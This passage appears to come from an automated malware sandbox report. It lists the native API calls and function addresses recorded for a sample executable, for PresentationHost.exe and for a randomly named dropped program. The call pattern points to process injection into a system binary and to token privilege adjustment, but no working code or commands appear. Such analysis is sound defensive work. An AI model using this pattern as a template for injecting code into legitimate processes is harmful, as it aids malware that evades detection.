Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F4340 NtSetContextThread,	8_2_339F4340
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F4650 NtSuspendThread,	8_2_339F4650
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2B80 NtQueryInformationFile,	8_2_339F2B80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2BA0 NtEnumerateValueKey,	8_2_339F2BA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2BF0 NtAllocateVirtualMemory,	8_2_339F2BF0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2BE0 NtQueryValueKey,	8_2_339F2BE0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2B60 NtClose,	8_2_339F2B60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2AB0 NtWaitForSingleObject,	8_2_339F2AB0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2AD0 NtReadFile,	8_2_339F2AD0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2AF0 NtWriteFile,	8_2_339F2AF0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2F90 NtProtectVirtualMemory,	8_2_339F2F90
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2FB0 NtResumeThread,	8_2_339F2FB0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2FA0 NtQuerySection,	8_2_339F2FA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2FE0 NtCreateFile,	8_2_339F2FE0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2F30 NtCreateSection,	8_2_339F2F30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2F60 NtCreateProcessEx,	8_2_339F2F60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2E80 NtReadVirtualMemory,	8_2_339F2E80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2EA0 NtAdjustPrivilegesToken,	8_2_339F2EA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2EE0 NtQueueApcThread,	8_2_339F2EE0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2E30 NtWriteVirtualMemory,	8_2_339F2E30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2DB0 NtEnumerateKey,	8_2_339F2DB0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2DD0 NtDelayExecution,	8_2_339F2DD0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2D10 NtMapViewOfSection,	8_2_339F2D10
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2D00 NtSetInformationFile,	8_2_339F2D00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2D30 NtUnmapViewOfSection,	8_2_339F2D30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2CA0 NtQueryInformationToken,	8_2_339F2CA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2CC0 NtQueryVirtualMemory,	8_2_339F2CC0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2CF0 NtOpenProcess,	8_2_339F2CF0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2C00 NtQueryInformationProcess,	8_2_339F2C00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2C70 NtFreeVirtualMemory,	8_2_339F2C70
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2C60 NtCreateKey,	8_2_339F2C60
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05314650 NtSuspendThread,LdrInitializeThunk,	12_2_05314650
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05314340 NtSetContextThread,LdrInitializeThunk,	12_2_05314340
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_05312D30
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_05312D10
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_05312DF0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312DD0 NtDelayExecution,LdrInitializeThunk,	12_2_05312DD0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_05312C70
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312C60 NtCreateKey,LdrInitializeThunk,	12_2_05312C60
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_05312CA0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312F30 NtCreateSection,LdrInitializeThunk,	12_2_05312F30
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312FB0 NtResumeThread,LdrInitializeThunk,	12_2_05312FB0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312FE0 NtCreateFile,LdrInitializeThunk,	12_2_05312FE0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_05312E80
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_05312EE0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312B60 NtClose,LdrInitializeThunk,	12_2_05312B60
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_05312BA0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_05312BF0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_05312BE0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312AF0 NtWriteFile,LdrInitializeThunk,	12_2_05312AF0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312AD0 NtReadFile,LdrInitializeThunk,	12_2_05312AD0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053135C0 NtCreateMutant,LdrInitializeThunk,	12_2_053135C0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053139B0 NtGetContextThread,LdrInitializeThunk,	12_2_053139B0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312D00 NtSetInformationFile,	12_2_05312D00
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312DB0 NtEnumerateKey,	12_2_05312DB0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312C00 NtQueryInformationProcess,	12_2_05312C00
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312CF0 NtOpenProcess,	12_2_05312CF0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312CC0 NtQueryVirtualMemory,	12_2_05312CC0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312F60 NtCreateProcessEx,	12_2_05312F60
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312FA0 NtQuerySection,	12_2_05312FA0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312F90 NtProtectVirtualMemory,	12_2_05312F90
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312E30 NtWriteVirtualMemory,	12_2_05312E30
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312EA0 NtAdjustPrivilegesToken,	12_2_05312EA0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312B80 NtQueryInformationFile,	12_2_05312B80
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05312AB0 NtWaitForSingleObject,	12_2_05312AB0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05313010 NtOpenDirectoryObject,	12_2_05313010
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05313090 NtSetValueKey,	12_2_05313090
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05313D10 NtOpenProcessToken,	12_2_05313D10
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05313D70 NtOpenThread,	12_2_05313D70
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F89790 NtCreateFile,	12_2_02F89790
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F89A90 NtClose,	12_2_02F89A90
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F89BF0 NtAllocateVirtualMemory,	12_2_02F89BF0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F899F0 NtDeleteFile,	12_2_02F899F0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F89900 NtReadFile,	12_2_02F89900

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004033B6

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 0_2_00406846	0_2_00406846
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 0_2_00404C59	0_2_00404C59
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7132D	8_2_33A7132D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AD34C	8_2_339AD34C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C52A0	8_2_339C52A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DD2F0	8_2_339DD2F0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CB1B0	8_2_339CB1B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A8B16B	8_2_33A8B16B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AF172	8_2_339AF172
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F516C	8_2_339F516C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7F0E0	8_2_33A7F0E0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A770E9	8_2_33A770E9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C70C0	8_2_339C70C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6F0CC	8_2_33A6F0CC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7F7B0	8_2_33A7F7B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B17EC	8_2_339B17EC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A716CC	8_2_33A716CC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A05630	8_2_33A05630
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5D5B0	8_2_33A5D5B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A895C3	8_2_33A895C3
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A77571	8_2_33A77571
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7F43F	8_2_33A7F43F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1460	8_2_339B1460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DFB80	8_2_339DFB80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A35BF0	8_2_33A35BF0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339FDBF9	8_2_339FDBF9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7FB76	8_2_33A7FB76
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A61AA3	8_2_33A61AA3
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5DAAC	8_2_33A5DAAC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6DAC6	8_2_33A6DAC6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A33A6C	8_2_33A33A6C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A77A46	8_2_33A77A46
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7FA49	8_2_33A7FA49
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C5990	8_2_339C5990
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A55910	8_2_33A55910
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C9950	8_2_339C9950
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB950	8_2_339DB950
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C38E0	8_2_339C38E0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A2D800	8_2_33A2D800
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C1F92	8_2_339C1F92
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7FFB1	8_2_33A7FFB1
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7FF09	8_2_33A7FF09
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C9EB0	8_2_339C9EB0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DFDC0	8_2_339DFDC0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A77D73	8_2_33A77D73
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A71D5A	8_2_33A71D5A
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7FCF2	8_2_33A7FCF2
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A39C32	8_2_33A39C32
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A803E6	8_2_33A803E6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CE3F0	8_2_339CE3F0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7A352	8_2_33A7A352
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A402C0	8_2_33A402C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A801AA	8_2_33A801AA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A741A2	8_2_33A741A2
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A821AE	8_2_33A821AE
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A781CC	8_2_33A781CC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B0100	8_2_339B0100
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5A118	8_2_33A5A118
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A48158	8_2_33A48158
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A52000	8_2_33A52000
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BC7C0	8_2_339BC7C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E4750	8_2_339E4750
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C0770	8_2_339C0770
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DC6E0	8_2_339DC6E0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A80591	8_2_33A80591
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C0535	8_2_339C0535
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6E4F6	8_2_33A6E4F6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A64420	8_2_33A64420
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A72446	8_2_33A72446
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7EB89	8_2_33A7EB89
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A76BD7	8_2_33A76BD7
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7AB40	8_2_33A7AB40
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BEA80	8_2_339BEA80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A8A9A6	8_2_33A8A9A6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C29A0	8_2_339C29A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D6962	8_2_339D6962
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A68B8	8_2_339A68B8
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339EE8F0	8_2_339EE8F0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CA840	8_2_339CA840
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3EFA0	8_2_33A3EFA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B2FC8	8_2_339B2FC8
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A02F28	8_2_33A02F28
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A62F30	8_2_33A62F30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E0F30	8_2_339E0F30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A34F40	8_2_33A34F40
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D2E90	8_2_339D2E90
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7CE93	8_2_33A7CE93
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7EEDB	8_2_33A7EEDB
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7EE26	8_2_33A7EE26
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C0E59	8_2_339C0E59
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D8DBF	8_2_339D8DBF
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C8DC0	8_2_339C8DC0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BADE0	8_2_339BADE0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CAD00	8_2_339CAD00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5CD1F	8_2_33A5CD1F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B0CF2	8_2_339B0CF2
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C0C00	8_2_339C0C00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CEC60	8_2_339CEC60
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D5A5B5	11_2_04D5A5B5
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D43FD5	11_2_04D43FD5
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D3B7B5	11_2_04D3B7B5
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D3B7AC	11_2_04D3B7AC
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D421D5	11_2_04D421D5
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D3B9D5	11_2_04D3B9D5
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D399C5	11_2_04D399C5
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D39B15	11_2_04D39B15
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D39B09	11_2_04D39B09
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE87B2	11_2_07BE87B2
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE1FB2	11_2_07BE1FB2
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BDFFA2	11_2_07BDFFA2
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BDFF9A	11_2_07BDFF9A
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE6F22	11_2_07BE6F22
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BEA5B2	11_2_07BEA5B2
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE1D92	11_2_07BE1D92
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE1D89	11_2_07BE1D89
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07C00B92	11_2_07C00B92
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE00F2	11_2_07BE00F2
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE00E6	11_2_07BE00E6
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E0535	12_2_052E0535
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053A0591	12_2_053A0591
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05384420	12_2_05384420
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05392446	12_2_05392446
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0538E4F6	12_2_0538E4F6
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E0770	12_2_052E0770
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05304750	12_2_05304750
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052DC7C0	12_2_052DC7C0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052FC6E0	12_2_052FC6E0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052D0100	12_2_052D0100
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0537A118	12_2_0537A118
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05368158	12_2_05368158
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053A01AA	12_2_053A01AA
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053A21AE	12_2_053A21AE
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053941A2	12_2_053941A2
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053981CC	12_2_053981CC
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05372000	12_2_05372000
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539A352	12_2_0539A352
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053A03E6	12_2_053A03E6
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052EE3F0	12_2_052EE3F0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053602C0	12_2_053602C0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0537CD1F	12_2_0537CD1F
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052EAD00	12_2_052EAD00
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052F8DBF	12_2_052F8DBF
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052DADE0	12_2_052DADE0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E8DC0	12_2_052E8DC0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E0C00	12_2_052E0C00
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052D0CF2	12_2_052D0CF2
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05300F30	12_2_05300F30
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05382F30	12_2_05382F30
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05322F28	12_2_05322F28
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05354F40	12_2_05354F40
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0535EFA0	12_2_0535EFA0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052D2FC8	12_2_052D2FC8
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539EE26	12_2_0539EE26
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539CE93	12_2_0539CE93
